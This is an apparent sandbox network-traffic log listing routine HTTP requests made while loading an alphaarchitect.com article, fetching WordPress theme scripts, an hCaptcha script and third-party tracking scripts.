Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-menu.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/awb-mega-menu.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-tooltip.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-fade.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/awb-background-slider.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-to-top.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /px/smart/?c=2645100a8c95db0&seg=2024/12/long-term-expected-returns HTTP/1.1Host: a.remarketstats.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-custom-header.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/library/bootstrap.scrollspy.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /api/v3/domain_settings/a?callback=pfMod.saveDSSettings&hostname=alphaarchitect.com&client_version=client HTTP/1.1Host: www.printfriendly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-animations.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-scrollspy.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-title.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-button.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-responsive-typography.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-widget-areas.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /uwt.js HTTP/1.1Host: static.ads-twitter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-container.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-scroll-to-anchor.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-fade.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-video.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-column.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/hcaptcha-for-forms-and-more/assets/js/apps/hcaptcha.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-to-top.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/hcaptcha-for-forms-and-more/assets/js/hcaptcha-gravity-forms.min.js?ver=4.8.0 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-custom-header.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/library/bootstrap.scrollspy.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /api/v3/domain_settings/a?callback=pfMod.saveDSSettings&hostname=alphaarchitect.com&client_version=client HTTP/1.1Host: www.printfriendly.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/enterprise/core.js?ver=1734350104 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-scrollspy.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /px/smart/a/?c=2645100a8c95db0&seg=2024/12/long-term-expected-returns HTTP/1.1Host: a.clickcertain.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-responsive-typography.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-scroll-to-anchor.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-video.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
